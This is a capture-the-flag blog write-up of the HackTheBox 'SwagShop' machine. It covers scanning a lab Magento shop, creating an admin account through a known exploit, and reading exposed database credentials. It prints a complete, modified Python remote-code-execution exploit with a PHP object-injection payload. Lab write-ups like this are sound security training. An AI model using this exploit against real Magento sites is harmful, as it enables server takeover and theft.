<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HackTheBox - SwagShop | amirr0r</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox - SwagShop" /><meta name="author" content="amirr0r" /><meta property="og:locale" content="en_US" /><meta name="description" content="Foothold" /><meta property="og:description" content="Foothold" /><link rel="canonical" href="https://amirr0r.github.io/posts/htb-swagshop/" /><meta property="og:url" content="https://amirr0r.github.io/posts/htb-swagshop/" /><meta property="og:site_name" content="amirr0r" /><meta property="og:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/SwagShop.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-12-26T18:10:00+01:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/SwagShop.png" /><meta property="twitter:title" content="HackTheBox - SwagShop" /><meta name="twitter:site" content="@amirr0r_" /><meta name="twitter:creator" content="@amirr0r" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Foothold","headline":"HackTheBox - SwagShop","dateModified":"2020-12-26T18:10:00+01:00","datePublished":"2020-12-26T18:10:00+01:00","@type":"BlogPosting","image":"https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/SwagShop.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://amirr0r.github.io/posts/htb-swagshop/"},"url":"https://amirr0r.github.io/posts/htb-swagshop/","author":{"@type":"Person","name":"amirr0r"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">amirr0r</a></div><div class="site-subtitle font-italic"></div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/amirr0r" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/amirr0r_" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/amir-barnat/?locale=en_US" target="_blank"> <i class="fab fa-linkedin-in"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox - SwagShop</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sat, Dec 26, 2020, 6:10 PM +0100" > Dec 26, 2020 <i class="unloaded">2020-12-26T18:10:00+01:00</i> </span> by <span class="author"> amirr0r </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Mon, Jan 4, 2021, 12:20 PM +0100" > Jan 4, 2021 <i class="unloaded">2021-01-04T12:20:49+01:00</i> </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/SwagShop.png" class="post-preview-img"><h2 id="foothold">Foothold</h2><h3 id="nmap-scan-open-ports"><code class="language-plaintext highlighter-rouge">nmap</code> scan (open ports)</h3><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-min-rate</span> 5000 <span class="nt">--max-retries</span> 1 <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-p-</span> <span class="nt">-oN</span> SwagShop-full-port-scan.txt 10.10.10.140
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec <span class="o">(</span>RSA<span class="o">)</span>
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Home page
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><h3 id="apache-2418-port-80--magento-open-source-e-commerce">Apache 2.4.18 (port 80) | Magento (open source e-commerce)</h3><p><a href="http://10.10.10.140/">http://10.10.10.140/</a> seems to be an online shop with a <strong>Magento</strong> backend:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/shop.png" alt="shop" /></p><p>2014 is the last time the website was edited?!</p><p>By navigating through the website, there is something strange that we can notice, directories are prefixed with <code class="language-plaintext highlighter-rouge">/index.php/</code>. This is probably due to <strong>apache mod-rewrite misconfiguration</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/strange.png" alt="strange" /></p><p>Thereby, I ran <code class="language-plaintext highlighter-rouge">dirb</code>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/dirb.png" alt="dirb" /></p><p>And we found an admin panel on <a href="http://10.10.10.140/index.php/admin">http://10.10.10.140/index.php/admin</a>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/admin-panel.png" alt="admin-panel" /></p><h4 id="exploit-creates-admin-account">exploit creates admin account</h4><p>Despite the fact that I don’t know the version yet, I’ve researched some exploits but either they are outdated <em>(if we refer to the 2014 copyright)</em>, or they require authentication credentials, or they target specific magento plugins.</p><p>Except for this one <a href="https://www.exploit-db.com/exploits/37977">Magento eCommerce - Remote Code Execution</a>. I just changed line 5 and 13 because of the <code class="language-plaintext highlighter-rouge">/index.php</code> prefix:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/rce.png" alt="rce" /></p><p>An it worked:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/worked.png" alt="worked" /></p><p>I logged in and I didn’t understand why I was redirected to this page first:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/png.png" alt="png" /></p><p>Then I changed the URL to <a href="http://10.10.10.140/index.php/admin">http://10.10.10.140/index.php/admin</a> and I was redirected to the Magento’s admin dashboard:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/magento-admin-panel.png" alt="magento-admin-panel" /></p><h4 id="magescan"><code class="language-plaintext highlighter-rouge">magescan</code></h4><p>At this point, I looked for <em>“magento scanners”</em> and I found this <a href="https://github.com/steverobbins/magescan">one</a> (<code class="language-plaintext highlighter-rouge">magescan</code>):</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/magescan-2.png" alt="magescan-2" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/magescan-1.png" alt="magescan-1" /></p><p>If we take a look at this URL that the scanner found → <a href="http://10.10.10.140/app/etc/local.xml">http://10.10.10.140/app/etc/local.xml</a>, we get mysql credentials in clear text:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/creds.png" alt="credentials" /></p><h4 id="exploit-remote-code-execution">exploit remote code execution</h4><p>Now that we know the version, we can take a look at the exploit which requires authentication: <a href="https://www.exploit-db.com/exploits/37811">Magento CE &lt; 1.9.0.1 - (Authenticated) Remote Code Execution </a></p><p>We fill these lines with the credentials created by the previous exploit, and the install date we saw on <a href="http://10.10.10.140/app/etc/local.xml">http://10.10.10.140/app/etc/local.xml</a>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/exploit-2-help.png" alt="exploit 2 args" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/exploit-2-config.png" alt="config exploit 2" /></p><p>Then I encountered this error:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/exploit-2-error-2.png" alt="error 2 exploit 2" /></p><p>I had to change line containing:</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="n">request</span> <span class="o">=</span> <span class="n">br</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span> <span class="o">+</span> <span class="s">'block/tab_orders/period/7d/?isAjax=true'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">'isAjax=false&amp;form_key='</span> <span class="o">+</span> <span class="n">key</span><span class="p">)</span>
</pre></table></code></div></div><p>into:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/swagshop/2y.png" alt="" /></p><p>Exploit after updates:</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
</pre><td class="rouge-code"><pre><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">md5</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">mechanize</span>


<span class="k">def</span> <span class="nf">usage</span><span class="p">():</span>
    <span class="k">print</span> <span class="s">"Usage: python %s &lt;target&gt; &lt;argument&gt;</span><span class="se">\n</span><span class="s">Example: python %s http://localhost </span><span class="se">\"</span><span class="s">uname -a</span><span class="se">\"</span><span class="s">"</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">()</span>


<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">:</span>
    <span class="n">usage</span><span class="p">()</span>

<span class="c1"># Command-line args
</span><span class="n">target</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">arg</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>

<span class="c1"># Config.
</span><span class="n">username</span> <span class="o">=</span> <span class="s">'forme'</span>
<span class="n">password</span> <span class="o">=</span> <span class="s">'forme'</span>
<span class="n">php_function</span> <span class="o">=</span> <span class="s">'system'</span>  <span class="c1"># Note: we can only pass 1 argument to the function
</span><span class="n">install_date</span> <span class="o">=</span> <span class="s">'Wed, 08 May 2019 07:23:09 +0000'</span>  <span class="c1"># This needs to be the exact date from /app/etc/local.xml
</span>
<span class="c1"># POP chain to pivot into call_user_exec
</span><span class="n">payload</span> <span class="o">=</span> <span class="s">'O:8:</span><span class="se">\"</span><span class="s">Zend_Log</span><span class="se">\"</span><span class="s">:1:{s:11:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_writers</span><span class="se">\"</span><span class="s">;a:2:{i:0;O:20:</span><span class="se">\"</span><span class="s">Zend_Log_Writer_Mail</span><span class="se">\"</span><span class="s">:4:{s:16:'</span> \
          <span class="s">'</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_eventsToMail</span><span class="se">\"</span><span class="s">;a:3:{i:0;s:11:</span><span class="se">\"</span><span class="s">EXTERMINATE</span><span class="se">\"</span><span class="s">;i:1;s:12:</span><span class="se">\"</span><span class="s">EXTERMINATE!</span><span class="se">\"</span><span class="s">;i:2;s:15:</span><span class="se">\"</span><span class="s">'</span> \
          <span class="s">'EXTERMINATE!!!!</span><span class="se">\"</span><span class="s">;}s:22:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_subjectPrependText</span><span class="se">\"</span><span class="s">;N;s:10:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_layout</span><span class="se">\"</span><span class="s">;O:23:</span><span class="se">\"</span><span class="s">'</span>     \
          <span class="s">'Zend_Config_Writer_Yaml</span><span class="se">\"</span><span class="s">:3:{s:15:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_yamlEncoder</span><span class="se">\"</span><span class="s">;s:%d:</span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s">;s:17:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">'</span>     \
          <span class="s">'_loadedSection</span><span class="se">\"</span><span class="s">;N;s:10:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_config</span><span class="se">\"</span><span class="s">;O:13:</span><span class="se">\"</span><span class="s">Varien_Object</span><span class="se">\"</span><span class="s">:1:{s:8:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_data</span><span class="se">\"</span><span class="s">'</span> \
          <span class="s">';s:%d:</span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s">;}}s:8:</span><span class="se">\"\00</span><span class="s">*</span><span class="se">\00</span><span class="s">_mail</span><span class="se">\"</span><span class="s">;O:9:</span><span class="se">\"</span><span class="s">Zend_Mail</span><span class="se">\"</span><span class="s">:0:{}}i:1;i:2;}}'</span> <span class="o">%</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">php_function</span><span class="p">),</span> <span class="n">php_function</span><span class="p">,</span>
                                                                                     <span class="nb">len</span><span class="p">(</span><span class="n">arg</span><span class="p">),</span> <span class="n">arg</span><span class="p">)</span>
<span class="c1"># Setup the mechanize browser and options
</span><span class="n">br</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
<span class="c1">#br.set_proxies({"http": "localhost:8080"})
</span><span class="n">br</span><span class="p">.</span><span class="n">set_handle_robots</span><span class="p">(</span><span class="bp">False</span><span class="p">)</span>

<span class="n">request</span> <span class="o">=</span> <span class="n">br</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>

<span class="n">br</span><span class="p">.</span><span class="n">select_form</span><span class="p">(</span><span class="n">nr</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
<span class="n">br</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="n">fixup</span><span class="p">()</span>
<span class="n">br</span><span class="p">[</span><span class="s">'login[username]'</span><span class="p">]</span> <span class="o">=</span> <span class="n">username</span>
<span class="n">br</span><span class="p">[</span><span class="s">'login[password]'</span><span class="p">]</span> <span class="o">=</span> <span class="n">password</span>

<span class="n">br</span><span class="p">.</span><span class="n">method</span> <span class="o">=</span> <span class="s">"POST"</span>
<span class="n">request</span> <span class="o">=</span> <span class="n">br</span><span class="p">.</span><span class="n">submit</span><span class="p">()</span>
<span class="n">content</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>

<span class="n">url</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="s">"ajaxBlockUrl = </span><span class="se">\'</span><span class="s">(.*)</span><span class="se">\'</span><span class="s">"</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="n">url</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="s">"var FORM_KEY = '(.*)'"</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">key</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="n">request</span> <span class="o">=</span> <span class="n">br</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span> <span class="o">+</span> <span class="s">'block/tab_orders/period/2y/?isAjax=true'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">'isAjax=false&amp;form_key='</span> <span class="o">+</span> <span class="n">key</span><span class="p">)</span>

<span class="n">tunnel</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="s">"src=</span><span class="se">\"</span><span class="s">(.*)\?ga="</span><span class="p">,</span> <span class="n">request</span><span class="p">.</span><span class="n">read</span><span class="p">())</span>
<span class="n">tunnel</span> <span class="o">=</span> <span class="n">tunnel</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="n">payload</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">gh</span> <span class="o">=</span> <span class="n">md5</span><span class="p">(</span><span class="n">payload</span> <span class="o">+</span> <span class="n">install_date</span><span class="p">).</span><span class="n">hexdigest</span><span class="p">()</span>

<span class="n">exploit</span> <span class="o">=</span> <span class="n">tunnel</span> <span class="o">+</span> <span class="s">'?ga='</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="s">'&amp;h='</span> <span class="o">+</span> <span class="n">gh</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">request</span> <span class="o">=</span> <span class="n">br</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">exploit</span><span class="p">)</span>
<span class="k">except</span> <span class="p">(</span><span class="n">mechanize</span><span class="p">.</span><span class="n">HTTPError</span><span class="p">,</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">URLError</span><span class="p">)</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="k">print</span> <span class="n">e</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
